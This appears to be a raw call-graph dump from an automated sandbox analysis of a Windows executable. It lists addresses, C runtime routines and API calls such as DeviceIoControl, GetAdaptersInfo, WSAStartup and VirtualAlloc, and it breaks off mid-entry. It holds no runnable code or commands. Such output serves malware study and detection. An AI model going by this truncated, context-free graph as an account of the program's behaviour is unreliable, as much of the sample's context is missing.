__aulldvrm _strlen 20289->20307 20330 2619de1 20289->20330 20291 2615e0b __fptostr 59 API calls 20290->20291 20292 2616b50 20291->20292 20295 2614ea5 __fptostr 9 API calls 20292->20295 20294 2616b25 20296 26144fb __crtLCMapStringA_stat 6 API calls 20294->20296 20295->20294 20297 2612426 20296->20297 20297->18882 20309 2615eb1 20297->20309 20299 2616b80 79 API calls _write_multi_char 20299->20307 20300 2616703 RtlDecodePointer 20300->20307 20301 2616bc8 79 API calls _write_multi_char 20301->20307 20302 2612f24 _free 59 API calls 20302->20307 20303 2618a64 __malloc_crt 59 API calls 20303->20307 20304 2616766 RtlDecodePointer 20304->20307 20305 261678b RtlDecodePointer 20305->20307 20306 261fa94 61 API calls __cftof 20306->20307 20307->20290 20307->20294 20307->20299 20307->20300 20307->20301 20307->20302 20307->20303 20307->20304 20307->20305 20307->20306 20308 2616bf4 79 API calls _write_string 20307->20308 20337 261dcbe 20307->20337 20308->20307 20310 2619de1 __filbuf 59 API calls 20309->20310 20311 2615ebf 20310->20311 20312 2615ee1 20311->20312 20313 2615eca 20311->20313 20315 2615ee6 20312->20315 20324 2615ef3 __flsbuf 20312->20324 20314 2615e0b __fptostr 59 API calls 20313->20314 20323 2615ecf 20314->20323 20316 2615e0b __fptostr 59 API calls 20315->20316 20316->20323 20317 2615f4d 20318 2615fd1 20317->20318 20319 2615f57 20317->20319 20320 2619e05 __write 79 API calls 20318->20320 20321 2615f71 20319->20321 20326 2615f88 20319->20326 20320->20323 20352 2619e05 20321->20352 20323->18882 20324->20317 20324->20323 20327 2615f42 20324->20327 20340 261f752 20324->20340 20326->20323 20380 261f7a6 20326->20380 20327->20317 20349 261f915 20327->20349 20331 2619e00 20330->20331 20332 2619deb 20330->20332 20331->20307 20333 2615e0b __fptostr 59 API calls 20332->20333 20334 2619df0 20333->20334 20335 2614ea5 __fptostr 9 API calls 20334->20335 20336 2619dfb 20335->20336 20336->20307 20338 261222b _LocaleUpdate::_LocaleUpdate 59 API calls 20337->20338 20339 261dccf 20338->20339 20339->20307 20341 261f76a 20340->20341 20342 261f75d 20340->20342 20345 261f776 20341->20345 20346 2615e0b __fptostr 59 API calls 20341->20346 20343 2615e0b __fptostr 59 API calls 20342->20343 20344 261f762 20343->20344 20344->20327 20345->20327 20347 261f797 20346->20347 20348 2614ea5 __fptostr 9 API calls 20347->20348 20348->20344 20350 2618a64 __malloc_crt 59 API calls 20349->20350 20351 261f92a 20350->20351 20351->20317 20353 2619e11 ___DllMainCRTStartup 20352->20353 20354 2619e35 20353->20354 20355 2619e1e 20353->20355 20357 2619ed4 20354->20357 20359 2619e49 20354->20359 20356 2615dd7 __commit 59 API calls 20355->20356 20358 2619e23 20356->20358 20360 2615dd7 __commit 59 API calls 20357->20360 20361 2615e0b __fptostr 59 API calls 20358->20361 20362 2619e71 20359->20362 20363 2619e67 20359->20363 20364 2619e6c 20360->20364 20374 2619e2a ___DllMainCRTStartup 20361->20374 20405 2620c37 20362->20405 20365 2615dd7 __commit 59 API calls 20363->20365 20368 2615e0b __fptostr 59 API calls 20364->20368 20365->20364 20367 2619e77 20369 2619e8a 20367->20369 20370 2619e9d 20367->20370 20371 2619ee0 20368->20371 20414 2619ef4 20369->20414 20375 2615e0b __fptostr 59 API calls 20370->20375 20373 2614ea5 __fptostr 9 API calls 20371->20373 20373->20374 20374->20323 20377 2619ea2 20375->20377 20376 2619e96 20473 2619ecc 20376->20473 20378 2615dd7 __commit 59 API calls 20377->20378 20378->20376 20381 261f7b2 ___DllMainCRTStartup 20380->20381 20382 261f7c3 20381->20382 20383 261f7db 20381->20383 20384 2615dd7 __commit 59 API calls 20382->20384 20385 261f880 20383->20385 20390 261f810 20383->20390 20386 261f7c8 20384->20386 20387 2615dd7 __commit 59 API calls 20385->20387 20388 2615e0b __fptostr 59 API calls 20386->20388 20389 261f885 20387->20389 20399 261f7d0 ___DllMainCRTStartup 20388->20399 20391 2615e0b __fptostr 59 API calls 20389->20391 20392 2620c37 ___lock_fhandle 60 API calls 20390->20392 20393 261f88d 20391->20393 20394 261f816 20392->20394 20395 2614ea5 __fptostr 9 API calls 20393->20395 20396 261f844 20394->20396 20397 261f82c 20394->20397 20395->20399 20400 2615e0b __fptostr 59 API calls 20396->20400 20398 261f8a2 __lseeki64_nolock 61 API calls 20397->20398 20401 261f83b 20398->20401 20399->20323 20402 261f849 20400->20402 20506 261f878 20401->20506 20403 2615dd7 __commit 59 API calls 20402->20403 20403->20401 20406 2620c43 ___DllMainCRTStartup 20405->20406 20407 2620c92 RtlEnterCriticalSection 20406->20407 20408 261889d __lock 59 API calls 20406->20408 20409 2620cb8 ___DllMainCRTStartup 20407->20409 20410 2620c68 20408->20410 20409->20367 20411 2620c80 20410->20411 20412 26191bc __ioinit InitializeCriticalSectionAndSpinCount 20410->20412 20476 2620cbc 20411->20476 20412->20411 20415 2619f01 __write_nolock 20414->20415 20416 2619f40 20415->20416 20417 2619f5f 20415->20417 20448 2619f35 20415->20448 20419 2615dd7 __commit 59 API calls 20416->20419 20420 2619fb7 20417->20420 20421 2619f9b 20417->20421 20418 26144fb __crtLCMapStringA_stat 6 API calls 20422 261a755 20418->20422 20423 2619f45 20419->20423 20432 2619fd0 20420->20432 20480 261f8a2 20420->20480 20424 2615dd7 __commit 59 API calls 20421->20424 20422->20376 20425 2615e0b __fptostr 59 API calls 20423->20425 20426 2619fa0 20424->20426 20427 2619f4c 20425->20427 20430 2615e0b __fptostr 59 API calls 20426->20430 20431 2614ea5 __fptostr 9 API calls 20427->20431 20429 261f752 __write_nolock 59 API calls 20433 2619fde 20429->20433 20434 2619fa7 20430->20434 20431->20448 20432->20429 20435 261a337 20433->20435 20439 2615c0a __beginthreadex 59 API calls 20433->20439 20438 2614ea5 __fptostr 9 API calls 20434->20438 20436 261a355 20435->20436 20437 261a6ca WriteFile 20435->20437 20440 261a479 20436->20440 20446 261a36b 20436->20446 20441 261a32a GetLastError 20437->20441 20450 261a2f7 20437->20450 20438->20448 20442 261a00a GetConsoleMode 20439->20442 20452 261a484 20440->20452 20466 261a56e 20440->20466 20441->20450 20442->20435 20444 261a049 20442->20444 20443 261a703 20443->20448 20449 2615e0b __fptostr 59 API calls 20443->20449 20444->20435 20445 261a059 GetConsoleCP 20444->20445 20445->20443 20471 261a088 20445->20471 20446->20443 20447 261a3da WriteFile 20446->20447 20446->20450 20447->20441 20447->20446 20448->20418 20453 261a731 20449->20453 20450->20443 20450->20448 20451 261a457 20450->20451 20454 261a462 20451->20454 20455 261a6fa 20451->20455 20452->20443 20452->20450 20457 261a4e9 WriteFile 20452->20457 20458 2615dd7 __commit 59 API calls 20453->20458 20459 2615e0b __fptostr 59 API calls 20454->20459 20460 2615dea __dosmaperr 59 API calls 20455->20460 20456 261a5e3 WideCharToMultiByte 20456->20441 20456->20466 20457->20441 20457->20452 20458->20448 20461 261a467 20459->20461 20460->20448 20463 2615dd7 __commit 59 API calls 20461->20463 20462 261a632 WriteFile 20465 261a685 GetLastError 20462->20465 20462->20466 20463->20448 20465->20466 20466->20443 20466->20450 20466->20456 20466->20462 20467 261ffba 61 API calls __write_nolock 20467->20471 20468 2621006 WriteConsoleW CreateFileW __putwch_nolock 20468->20471 20469 261a171 WideCharToMultiByte 20469->20450 20470 261a1ac WriteFile 20469->20470 20470->20441 20470->20471 20471->20441 20471->20450 20471->20467 20471->20468 20471->20469 20472 261a206 WriteFile 20471->20472 20489 261dcf8 20471->20489 20472->20441 20472->20471 20505 2620fe0 RtlLeaveCriticalSection 20473->20505 20475 2619ed2 20475->20374 20479 2618a07 RtlLeaveCriticalSection 20476->20479 20478 2620cc3 20478->20407 20479->20478 20492 2620ef4 20480->20492 20482 261f8b2 20483 261f8cb SetFilePointerEx 20482->20483 20484 261f8ba 20482->20484 20486 261f8e3 GetLastError 20483->20486 20487 261f8bf 20483->20487 20485 2615e0b __fptostr 59 API calls 20484->20485 20485->20487 20488 2615dea __dosmaperr 59 API calls 20486->20488 20487->20432 20488->20487 20490 261dcbe __isleadbyte_l 59 API calls 20489->20490 20491 261dd05 20490->20491 20491->20471 20493 2620eff 20492->20493 20495 2620f14 20492->20495 20494 2615dd7 __commit 59 API calls 20493->20494 20497 2620f04 20494->20497 20496 2615dd7 __commit 59 API calls 20495->20496 20500 2620f39 20495->20500 20498 2620f43 20496->20498 20499 2615e0b __fptostr 59 API calls 20497->20499 20501 2615e0b __fptostr 59 API calls 20498->20501 20502 2620f0c 20499->20502 20500->20482 20503 2620f4b 20501->20503 20502->20482 20504 2614ea5 __fptostr 9 API calls 20503->20504 20504->20502 20505->20475 20509 2620fe0 RtlLeaveCriticalSection 20506->20509 20508 261f87e 20508->20399 20509->20508 20510->18885 20512 260e2e8 __EH_prolog 20511->20512 20513 2613afc _Allocate 60 API calls 20512->20513 20514 260e2f1 20513->20514 20515 2601bfa RtlEnterCriticalSection 20514->20515 20517 260e4ff 20514->20517 20515->18890 20518 260e509 __EH_prolog 20517->20518 20521 26026db RtlEnterCriticalSection 20518->20521 20520 260e55f 20520->20515 20522 2602728 CreateWaitableTimerA 20521->20522 20523 260277e 20521->20523 20525 2602738 GetLastError 20522->20525 20526 260275b SetWaitableTimer 20522->20526 20524 26027d5 RtlLeaveCriticalSection 20523->20524 20527 2613afc _Allocate 60 API calls 20523->20527 20524->20520 20528 2610ac0 Mailbox 68 API calls 20525->20528 20526->20523 20529 260278a 20527->20529 20530 2602745 20528->20530 20532 2613afc _Allocate 60 API calls 20529->20532 20536 26027c8 20529->20536 20565 2601712 20530->20565 20534 26027a9 20532->20534 20537 2601cf8 CreateEventA 20534->20537 20571 2607db1 20536->20571 20538 2601d52 CreateEventA 20537->20538 20539 2601d23 GetLastError 20537->20539 20540 2601d6b GetLastError 20538->20540 20557 2601d96 20538->20557 20542 2601d33 20539->20542 20545 2601d7b 20540->20545 20541 2613369 __beginthreadex 201 API calls 20543 2601db6 20541->20543 20544 2610ac0 Mailbox 68 API calls 20542->20544 20546 2601dc6 GetLastError 20543->20546 20547 2601e0d 20543->20547 20548 2601d3c 20544->20548 20549 2610ac0 Mailbox 68 API calls 20545->20549 20554 2601dd8 20546->20554 20552 2601e11 WaitForSingleObject FindCloseChangeNotification 20547->20552 20553 2601e1d 20547->20553 20550 2601712 60 API calls 20548->20550 20551 2601d84 20549->20551 20555 2601d4e 20550->20555 20556 2601712 60 API calls 20551->20556 20552->20553 20553->20536 20558 2601ddc CloseHandle 20554->20558 20559 2601ddf 20554->20559 20555->20538 20556->20557 20557->20541 20558->20559 20560 2601de9 CloseHandle 20559->20560 20561 2601dee 20559->20561 20560->20561 20562 2610ac0 Mailbox 68 API calls 20561->20562 20563 2601dfb 20562->20563 20564 2601712 60 API calls 20563->20564 20564->20547 20566 260171c __EH_prolog 20565->20566 20567 260173e 20566->20567 20568 2601815 Mailbox 59 API calls 20566->20568 20567->20526 20569 2601732 20568->20569 20574 260a450 20569->20574 20572 2607dcd 20571->20572 20573 2607dbe CloseHandle 20571->20573 20572->20524 20573->20572 20575 260a45a __EH_prolog 20574->20575 20582 260c9b5 20575->20582 20579 260a47b 20580 261450a __CxxThrowException@8 RaiseException 20579->20580 20581 260a489 20580->20581 20583 260b1dc std::bad_exception::bad_exception 60 API calls 20582->20583 20584 260a46d 20583->20584 20585 260c9f1 20584->20585 20586 260c9fb __EH_prolog 20585->20586 20589 260b18b 20586->20589 20588 260ca2a Mailbox 20588->20579 20590 260b195 __EH_prolog 20589->20590 20591 260b1dc std::bad_exception::bad_exception 60 API calls 20590->20591 20592 260b1a6 Mailbox 20591->20592 20592->20588 20604 26030ae WSASetLastError 20593->20604 20596 26030ae 71 API calls 20597 2603c90 20596->20597 20598 26016ae 20597->20598 20599 26016b8 __EH_prolog 20598->20599 20600 2601701 20599->20600 20601 2612483 std::exception::exception 59 API calls 20599->20601 20600->18739 20602 26016dc 20601->20602 20603 260a450 60 API calls 20602->20603 20603->20600 20605 26030ec WSAStringToAddressA 20604->20605 20606 26030ce 20604->20606 20607 260a4b7 69 API calls 20605->20607 20606->20605 20608 26030d3 20606->20608 20609 2603114 20607->20609 20610 2610ac0 Mailbox 68 API calls 20608->20610 20611 2603154 20609->20611 20617 260311e _memcmp 20609->20617 20619 26030d8 20610->20619 20612 2603135 20611->20612 20614 2610ac0 Mailbox 68 API calls 20611->20614 20613 2603193 20612->20613 20615 2610ac0 Mailbox 68 API calls 20612->20615 20618 2610ac0 Mailbox 68 API calls 20613->20618 20613->20619 20614->20612 20615->20613 20616 2610ac0 Mailbox 68 API calls 20616->20612 20617->20612 20617->20616 20618->20619 20619->20596 20619->20597 20621 2603bdd __EH_prolog 20620->20621 20622 2603bfe htonl htonl 20621->20622 20632 2612467 20621->20632 20622->18905 20627 2603c20 __EH_prolog 20626->20627 20628 2603c41 20627->20628 20629 2612467 std::bad_exception::bad_exception 59 API calls 20627->20629 20628->18905 20630 2603c35 20629->20630 20631 260a605 60 API calls 20630->20631 20631->20628 20633 2612483 std::exception::exception 59 API calls 20632->20633 20634 2603bf2 20633->20634 20635 260a605 20634->20635 20636 260a60f __EH_prolog 20635->20636 20643 260cb28 20636->20643 20640 260a62a 20641 261450a __CxxThrowException@8 RaiseException 20640->20641 20642 260a638 20641->20642 20650 261244c 20643->20650 20646 260cb64 20647 260cb6e __EH_prolog 20646->20647 20653 260b4fa 20647->20653 20649 260cb9d Mailbox 20649->20640 20651 26124c3 std::exception::exception 59 API calls 20650->20651 20652 260a61c 20651->20652 20652->20646 20654 260b504 __EH_prolog 20653->20654 20655 261244c std::bad_exception::bad_exception 59 API calls 20654->20655 20656 260b515 Mailbox 20655->20656 20656->20649 20658 2603770 20657->20658 20659 2603755 InterlockedCompareExchange 20657->20659 20661 2610ac0 Mailbox 68 API calls 20658->20661 20659->20658 20660 2603765 20659->20660 20662 26032ab 78 API calls 20660->20662 20663 2603779 20661->20663 20662->20658 20664 26029ee 76 API calls 20663->20664 20665 260378e 20664->20665 20665->18909 20695 261365d 20666->20695 20668 26053c8 20668->18919 20669 26138b6 20668->20669 20670 26138c2 ___DllMainCRTStartup 20669->20670 20671 26138e0 20670->20671 20672 26138f8 20670->20672 20674 26138f0 ___DllMainCRTStartup 20670->20674 20673 2615e0b __fptostr 59 API calls 20671->20673 20837 26197a2 20672->20837 20676 26138e5 20673->20676 20674->18921 20678 2614ea5 __fptostr 9 API calls 20676->20678 20678->20674 20683 2613a40 ___DllMainCRTStartup 20682->20683 20684 2613a54 20683->20684 20685 2613a6c 20683->20685 20686 2615e0b __fptostr 59 API calls 20684->20686 20688 26197a2 __lock_file 60 API calls 20685->20688 20694 2613a64 ___DllMainCRTStartup 20685->20694 20687 2613a59 20686->20687 20689 2614ea5 __fptostr 9 API calls 20687->20689 20690 2613a7e 20688->20690 20689->20694 20864 26139c8 20690->20864 20694->18919 20698 2613669 ___DllMainCRTStartup 20695->20698 20696 261367b 20697 2615e0b __fptostr 59 API calls 20696->20697 20699 2613680 20697->20699 20698->20696 20700 26136a8 20698->20700 20701 2614ea5 __fptostr 9 API calls 20699->20701 20714 2619878 20700->20714 20711 261368b ___DllMainCRTStartup @_EH4_CallFilterFunc@8 20701->20711 20703 26136ad 20704 26136c3 20703->20704 20705 26136b6 20703->20705 20706 26136ec 20704->20706 20707 26136cc 20704->20707 20708 2615e0b __fptostr 59 API calls 20705->20708 20729 2619997 20706->20729 20709 2615e0b __fptostr 59 API calls 20707->20709 20708->20711 20709->20711 20711->20668 20715 2619884 ___DllMainCRTStartup 20714->20715 20716 261889d __lock 59 API calls 20715->20716 20722 2619892 20716->20722 20717 261990d 20719 2618a64 __malloc_crt 59 API calls 20717->20719 20721 2619914 20719->20721 20720 2619983 ___DllMainCRTStartup 20720->20703 20725 26191bc __ioinit InitializeCriticalSectionAndSpinCount 20721->20725 20727 2619906 20721->20727 20722->20717 20723 2618925 __mtinitlocknum 59 API calls 20722->20723 20722->20727 20749 26197e1 20722->20749 20754 261984b 20722->20754 20723->20722 20726 261993a RtlEnterCriticalSection 20725->20726 20726->20727 20759 261998e 20727->20759 20738 26199b4 20729->20738 20730 26199c8 20732 2615e0b __fptostr 59 API calls 20730->20732 20731 2619b6f 20731->20730 20735 2619bcb 20731->20735 20733 26199cd 20732->20733 20734 2614ea5 __fptostr 9 API calls 20733->20734 20736 26136f7 20734->20736 20770 26207e0 20735->20770 20746 2613719 20736->20746 20738->20730 20738->20731 20764 26207fe 20738->20764 20743 262092d __openfile 59 API calls 20744 2619b87 20743->20744 20744->20731 20745 262092d __openfile 59 API calls 20744->20745 20745->20731 20830 2619811 20746->20830 20748 261371f 20748->20711 20750 2619802 RtlEnterCriticalSection 20749->20750 20751 26197ec 20749->20751 20750->20722 20752 261889d __lock 59 API calls 20751->20752 20753 26197f5 20752->20753 20753->20722 20755 2619859 20754->20755 20756 261986c RtlLeaveCriticalSection 20754->20756 20762 2618a07 RtlLeaveCriticalSection 20755->20762 20756->20722 20758 2619869 20758->20722 20763 2618a07 RtlLeaveCriticalSection 20759->20763 20761 2619995 20761->20720 20762->20758 20763->20761 20773 2620816 20764->20773 20766 2619b35 20766->20730 20767 262092d 20766->20767 20781 2620945 20767->20781 20769 2619b68 20769->20731 20769->20743 20788 26206c9 20770->20788 20772 26207f9 20772->20736 20774 262082b 20773->20774 20780 2620824 20773->20780 20775 261222b _LocaleUpdate::_LocaleUpdate 59 API calls 20774->20775 20776 2620838 20775->20776 20777 2615e0b __fptostr 59 API calls 20776->20777 20776->20780 20778 262086b 20777->20778 20779 2614ea5 __fptostr 9 API calls 20778->20779 20779->20780 20780->20766 20782 261222b _LocaleUpdate::_LocaleUpdate 59 API calls 20781->20782 20784 2620958 20782->20784 20783 262096d 20783->20769 20784->20783 20785 2615e0b __fptostr 59 API calls 20784->20785 20786 2620999 20785->20786 20787 2614ea5 __fptostr 9 API calls 20786->20787 20787->20783 20790 26206d5 ___DllMainCRTStartup 20788->20790 20789 26206eb 20791 2615e0b __fptostr 59 API calls 20789->20791 20790->20789 20793 2620721 20790->20793 20792 26206f0 20791->20792 20794 2614ea5 __fptostr 9 API calls 20792->20794 20799 2620792 20793->20799 20798 26206fa ___DllMainCRTStartup 20794->20798 20798->20772 20808 26181e6 20799->20808 20801 262073d 20804 2620766 20801->20804 20802 26207a6 20802->20801 20803 2612f24 _free 59 API calls 20802->20803 20803->20801 20805 2620790 20804->20805 20806 262076c 20804->20806 20805->20798 20829 2620fe0 RtlLeaveCriticalSection 20806->20829 20809 26181f3 20808->20809 20810 2618209 20808->20810 20811 2615e0b __fptostr 59 API calls 20809->20811 20810->20809 20814 2618210 ___crtIsPackagedApp 20810->20814 20812 26181f8 20811->20812 20813 2614ea5 __fptostr 9 API calls 20812->20813 20822 2618202 20813->20822 20815 2618226 MultiByteToWideChar 20814->20815 20816 2618219 AreFileApisANSI 20814->20816 20818 2618251 20815->20818 20819 2618240 GetLastError 20815->20819 20816->20815 20817 2618223 20816->20817 20817->20815 20821 2618a64 __malloc_crt 59 API calls 20818->20821 20820 2615dea __dosmaperr 59 API calls 20819->20820 20820->20822 20823 2618259 20821->20823 20822->20802 20823->20822 20824 2618260 MultiByteToWideChar 20823->20824 20824->20822 20825 2618276 GetLastError 20824->20825 20826 2615dea __dosmaperr 59 API calls 20825->20826 20827 2618282 20826->20827 20828 2612f24 _free 59 API calls 20827->20828 20828->20822 20829->20805 20831 2619820 20830->20831 20832 261983f RtlLeaveCriticalSection 20830->20832 20831->20832 20833 2619827 20831->20833 20832->20748 20836 2618a07 RtlLeaveCriticalSection 20833->20836 20835 261983c 20835->20748 20836->20835 20838 26197b2 20837->20838 20839 26197d4 RtlEnterCriticalSection 20837->20839 20838->20839 20840 26197ba 20838->20840 20841 26138fe 20839->20841 20842 261889d __lock 59 API calls 20840->20842 20843 261375d 20841->20843 20842->20841 20845 261376c 20843->20845 20850 261378a 20843->20850 20844 261377a 20846 2615e0b __fptostr 59 API calls 20844->20846 20845->20844 20845->20850 20853 26137a4 _memmove 20845->20853 20847 261377f 20846->20847 20848 2614ea5 __fptostr 9 API calls 20847->20848 20848->20850 20849 2615eb1 __flsbuf 79 API calls 20849->20853 20855 2613930 20850->20855 20852 2619de1 __filbuf 59 API calls 20852->20853 20853->20849 20853->20850 20853->20852 20854 2619e05 __write 79 API calls 20853->20854 20858 261a79f 20853->20858 20854->20853 20856 2619811 __fsopen 2 API calls 20855->20856 20857 2613936 20856->20857 20857->20674 20859 261a7b2 20858->20859 20863 261a7d6 20858->20863 20860 2619de1 __filbuf 59 API calls 20859->20860 20859->20863 20861 261a7cf 20860->20861 20862 2619e05 __write 79 API calls 20861->20862 20862->20863 20863->20853 20865 26139d7 20864->20865 20866 26139eb 20864->20866 20867 2615e0b __fptostr 59 API calls 20865->20867 20868 26139e7 20866->20868 20870 261a79f __flush 79 API calls 20866->20870 20869 26139dc 20867->20869 20880 2613aa3 20868->20880 20871 2614ea5 __fptostr 9 API calls 20869->20871 20872 26139f7 20870->20872 20871->20868 20883 261b24b 20872->20883 20875 2619de1 __filbuf 59 API calls 20876 2613a05 20875->20876 20887 261b0d6 20876->20887 20878 2613a0b 20878->20868 20879 2612f24 _free 59 API calls 20878->20879 20879->20868 20881 2619811 __fsopen 2 API calls 20880->20881 20882 2613aa9 20881->20882 20882->20694 20884 261b258 20883->20884 20886 26139ff 20883->20886 20885 2612f24 _free 59 API calls 20884->20885 20884->20886 20885->20886 20886->20875 20888 261b0e2 ___DllMainCRTStartup 20887->20888 20889 261b106 20888->20889 20890 261b0ef 20888->20890 20892 261b191 20889->20892 20894 261b116 20889->20894 20891 2615dd7 __commit 59 API calls 20890->20891 20893 261b0f4 20891->20893 20895 2615dd7 __commit 59 API calls 20892->20895 20896 2615e0b __fptostr 59 API calls 20893->20896 20897 261b134 20894->20897 20898 261b13e 20894->20898 20899 261b139 20895->20899 20908 261b0fb ___DllMainCRTStartup 20896->20908 20900 2615dd7 __commit 59 API calls 20897->20900 20901 2620c37 ___lock_fhandle 60 API calls 20898->20901 20902 2615e0b __fptostr 59 API calls 20899->20902 20900->20899 20903 261b144 20901->20903 20904 261b19d 20902->20904 20905 261b162 20903->20905 20906 261b157 20903->20906 20910 2614ea5 __fptostr 9 API calls 20904->20910 20909 2615e0b __fptostr 59 API calls 20905->20909 20913 261b1b1 20906->20913 20908->20878 20911 261b15d 20909->20911 20910->20908 20928 261b189 20911->20928 20914 2620ef4 __commit 59 API calls 20913->20914 20915 261b1bf 20914->20915 20916 261b215 20915->20916 20917 261b1f3 20915->20917 20919 2620ef4 __commit 59 API calls 20915->20919 20931 2620e6e 20916->20931 20917->20916 20920 2620ef4 __commit 59 API calls 20917->20920 20923 261b1ea 20919->20923 20924 261b1ff CloseHandle 20920->20924 20922 261b23f 20922->20911 20926 2620ef4 __commit 59 API calls 20923->20926 20924->20916 20927 261b20b GetLastError 20924->20927 20925 2615dea __dosmaperr 59 API calls 20925->20922 20926->20917 20927->20916 20940 2620fe0 RtlLeaveCriticalSection 20928->20940 20930 261b18f 20930->20908 20932 2620eda 20931->20932 20933 2620e7a 20931->20933 20934 2615e0b __fptostr 59 API calls 20932->20934 20933->20932 20938 2620ea3 20933->20938 20935 2620edf 20934->20935 20936 2615dd7 __commit 59 API calls 20935->20936 20937 261b21d 20936->20937 20937->20922 20937->20925 20938->20937 20939 2620ec5 SetStdHandle 20938->20939 20939->20937 20940->20930 21327 2606487 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 21328 26064ef GetTickCount 21327->21328 21405 26042c7 21327->21405 21406 260605a 21328->21406 21407 2612f5c _malloc 59 API calls 21406->21407 21408 260606d 21407->21408 21409 40d3ab 21410 40d3c6 GetLocalTime 21409->21410 21411 40d3af 21409->21411 21414 401f27 21410->21414 21411->21410 21415 401f3c 21414->21415 21418 401a1d 21415->21418 21417 401f45 21419 401a2c 21418->21419 21424 401a4f CreateFileA 21419->21424 21423 401a3e 21423->21417 21425 401a35 21424->21425 21431 401a7d 21424->21431 21432 401b4b LoadLibraryA 21425->21432 21426 401a98 DeviceIoControl 21426->21431 21428 401b3a FindCloseChangeNotification 21428->21425 21429 401b0e GetLastError 21429->21428 21429->21431 21431->21426 21431->21428 21431->21429 21441 402ce6 21431->21441 21444 402cd8 21431->21444 21433 401c21 21432->21433 21434 401b6e GetProcAddress 21432->21434 21433->21423 21435 401c18 FreeLibrary 21434->21435 21437 401b85 21434->21437 21435->21433 21436 401b95 GetAdaptersInfo 21436->21437 21437->21436 21438 401c15 21437->21438 21439 402ce6 7 API calls 21437->21439 21440 402cd8 12 API calls 21437->21440 21438->21435 21439->21437 21440->21437 21447 4030e1 21441->21447 21477 403041 21444->21477 21448 402cef 21447->21448 21449 4030ed 21447->21449 21448->21431 21450 4030f7 21449->21450 21451 40310d 21449->21451 21453 403139 HeapFree 21450->21453 21454 403103 21450->21454 21452 403138 21451->21452 21456 403127 21451->21456 21452->21453 21453->21448 21458 40447e 21454->21458 21464 404f0f 21456->21464 21459 4044bc 21458->21459 21463 404772 21458->21463 21460 4046b8 VirtualFree 21459->21460 21459->21463 21461 40471c 21460->21461 21462 40472b VirtualFree HeapFree 21461->21462 21461->21463 21462->21463 21463->21448 21465 404f52 21464->21465 21466 404f3c 21464->21466 21465->21448 21466->21465 21468 404df6 21466->21468 21471 404e03 21468->21471 21469 404eb3 21469->21465 21470 404e24 VirtualFree 21470->21471 21471->21469 21471->21470 21473 404da0 VirtualFree 21471->21473 21474 404dbd 21473->21474 21475 404ded 21474->21475 21476 404dcd HeapFree 21474->21476 21475->21471 21476->21471 21478 402ce3 21477->21478 21480 403048 21477->21480 21478->21431 21480->21478 21481 40306d 21480->21481 21482 40307c 21481->21482 21485 403091 21481->21485 21489 40308a 21482->21489 21490 4047a7 21482->21490 21484 4030d0 HeapAlloc 21486 4030df 21484->21486 21485->21484 21485->21489 21496 404f54 21485->21496 21486->21480 21487 40308f 21487->21480 21489->21484 21489->21486 21489->21487 21492 4047d9 21490->21492 21491 404887 21491->21489 21492->21491 21495 404878 21492->21495 21503 404ab0 21492->21503 21495->21491 21510 404b61 21495->21510 21501 404f62 21496->21501 21497 40504e VirtualAlloc 21502 40501f 21497->21502 21498 405123 21514 404c5c 21498->21514 21501->21497 21501->21498 21501->21502 21502->21489 21504 404af3 HeapAlloc 21503->21504 21505 404ac3 HeapReAlloc 21503->21505 21506 404b19 VirtualAlloc 21504->21506 21509 404b43 21504->21509 21507 404ae2 21505->21507 21505->21509 21508 404b33 HeapFree 21506->21508 21506->21509 21507->21504 21508->21509 21509->21495 21511 404b73 VirtualAlloc 21510->21511 21513 404bbc 21511->21513 21513->21491 21515 404c70 HeapAlloc 21514->21515 21516 404c69 21514->21516 21517 404c8d VirtualAlloc 21515->21517 21518 404cc5 21515->21518 21516->21517 21519 404d82 21517->21519 21520 404cad VirtualAlloc 21517->21520 21518->21502 21519->21518 21521 404d8a HeapFree 21519->21521 21520->21518 21522 404d74 VirtualFree 21520->21522 21521->21518 21522->21519 21523 260104d 21524 2613354 __cinit 68 API calls 21523->21524 21525 2601057 21524->21525 21528 2601aa9 InterlockedIncrement 21525->21528 21529 2601ac5 WSAStartup InterlockedExchange 21528->21529 21530 260105c 21528->21530 21529->21530 20941 402810 VirtualAlloc 20942 40d38e 20941->20942 21531 402ef0 GetVersion 21555 404034 HeapCreate 21531->21555 21533 402f4f 21534 402f54 21533->21534 21535 402f5c 21533->21535 21630 40300b 21534->21630 21567 403d14 21535->21567 21538 402f64 GetCommandLineA 21581 403be2 21538->21581 21543 402f7e 21613 4038dc 21543->21613 21545 402f83 21546 402f88 GetStartupInfoA 21545->21546 21626 403884 21546->21626 21548 402f9a GetModuleHandleA 21550 402fbe 21548->21550 21636 40362b 21550->21636 21556 404054 21555->21556 21557 40408a 21555->21557 21643 403eec 21556->21643 21557->21533 21560 404070 21563 40408d 21560->21563 21565 404c5c 5 API calls 21560->21565 21561 404063 21655 40440b HeapAlloc 21561->21655 21563->21533 21564 40406d 21564->21563 21566 40407e HeapDestroy 21564->21566 21565->21564 21566->21557 21711 40302f 21567->21711 21570 403d33 GetStartupInfoA 21573 403d7f 21570->21573 21579 403e44 21570->21579 21574 403df0 21573->21574 21577 40302f 12 API calls 21573->21577 21573->21579 21574->21579 21580 403e12 GetFileType 21574->21580 21575 403eab SetHandleCount 21575->21538 21576 403e6b GetStdHandle 21578 403e79 GetFileType 21576->21578 21576->21579 21577->21573 21578->21579 21579->21575 21579->21576 21580->21574 21582 403c30 21581->21582 21583 403bfd GetEnvironmentStringsW 21581->21583 21585 403c05 21582->21585 21586 403c21 21582->21586 21584 403c11 GetEnvironmentStrings 21583->21584 21583->21585 21584->21586 21587 402f74 21584->21587 21588 403c49 WideCharToMultiByte 21585->21588 21589 403c3d GetEnvironmentStringsW 21585->21589 21586->21587 21590 403cc3 GetEnvironmentStrings 21586->21590 21591 403ccf 21586->21591 21604 403995 21587->21604 21593 403c7d 21588->21593 21594 403caf FreeEnvironmentStringsW 21588->21594 21589->21587 21589->21588 21590->21587 21590->21591 21595 40302f 12 API calls 21591->21595 21596 40302f 12 API calls 21593->21596 21594->21587 21602 403cea 21595->21602 21597 403c83 21596->21597 21597->21594 21598 403c8c WideCharToMultiByte 21597->21598 21600 403ca6 21598->21600 21601 403c9d 21598->21601 21599 403d00 FreeEnvironmentStringsA 21599->21587 21600->21594 21603 4030e1 7 API calls 21601->21603 21602->21599 21603->21600 21605 4039a7 21604->21605 21606 4039ac GetModuleFileNameA 21604->21606 21740 4061f4 21605->21740 21608 4039cf 21606->21608 21609 40302f 12 API calls 21608->21609 21610 4039f0 21609->21610 21611 402fe6 7 API calls 21610->21611 21612 403a00 21610->21612 21611->21612 21612->21543 21614 